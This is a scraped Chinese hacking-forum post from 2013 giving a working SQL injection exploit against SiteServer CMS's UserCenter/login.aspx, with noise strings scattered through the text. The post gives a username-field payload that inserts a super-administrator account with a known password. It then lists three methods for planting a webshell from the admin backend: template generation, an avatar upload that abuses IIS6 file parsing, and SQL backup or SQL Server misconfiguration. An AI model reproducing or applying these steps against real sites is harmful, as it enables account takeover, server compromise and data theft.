找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2900|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版, y  M( l  [, u
stieserver官网:www.siteserver.cn
. L" t; Y! Y9 e  B% F1 C8 F8 eEXP:0 l3 K1 B1 [/ o- K) l) a% O
直接访问UserCenter/login.aspx9 I$ a$ t/ ?8 l8 e+ S6 V
用户名处输入:
. I4 Y2 I6 Q2 r! ~& p! J3 t6 q) A% |8 h( y8 w: Z
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–9 U5 d8 M" Y* `& C7 a6 H
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
% N" ^! q" G4 W之后再访问后台SiteServer/login.aspx用插入的用户登陆
0 W9 g7 z; A5 Q. n1 }后台拿webshell的三种方法:( [7 w! e: K/ ?& K  d) l
一、& }- w. d5 P* E" G6 G0 O
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx- F/ d" `- X, v$ K
二、8 D. J6 |* Q* F8 |
成员权限-》添加用户-》用户名为:1.asp
; T; w7 H( Z: |. W1 h% g; J# \http://127.0.0.1/usercenter/
0 o% `* C5 q2 J% [2 E用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell# X) {- o0 n2 b* e; ^! N
(ps:后台添加用户时不会验证是否含有非法字符)+ t2 L4 u) V! d& |3 z
三、
& J8 `: F/ K. m系统工具-》实用工具-》机器参数查看0 c5 n1 o7 p9 s- q% T, K. n
可以看到数据库类型、名称,WEB路径
. T& h- W' J3 \8 N  ?$ x系统工具-》数据库工具-》SQL语句查询0 ~+ v8 `+ j) j5 G- H$ R
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表